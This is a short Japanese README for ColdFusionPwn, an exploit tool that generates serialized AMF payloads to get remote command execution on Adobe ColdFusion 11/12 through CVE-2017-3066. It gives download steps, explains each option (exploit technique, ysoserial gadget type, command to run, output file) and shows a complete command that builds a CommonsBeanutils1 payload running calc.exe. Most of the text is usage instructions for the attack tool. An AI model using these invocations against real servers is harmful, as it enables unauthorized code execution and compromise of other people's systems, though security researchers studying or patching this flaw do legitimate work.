
Adobe Coldfusion 11/12 を標的とした CVE-2017-3066 用エクスプロイトツール
CVE-2017-3066 を標的とした Adobe Coldfusion 11/12 向けエクスプロイトツール。
このツールは、許可されたクラスの入力検証が欠如していることを悪用するための、シリアライズ化された AMF ペイロードを生成できます。 詳細はブログ記事を参照してください。
最新版の ysoserial を入手してください。 releases から ColdFusionPwn を入手してください。
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
- [-s|-e] Setter (CF11) または Externalizable エクスプロイト (CF11/12) の手法
- [payload type] ysoserial ガジェットペイロード
- [command] 実行するコマンド
- [outfile] 生成されたペイロードの出力ファイル
ysoserial に同梱されている ApacheCommons BeanUtils ライブラリは新しいバージョン (かつ異なる serialversion uid を持つ) ため、クラスパスの先頭に ColdFusionPwn-0.0.1-SNAPSHOT-all.jar を配置する必要があります。
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf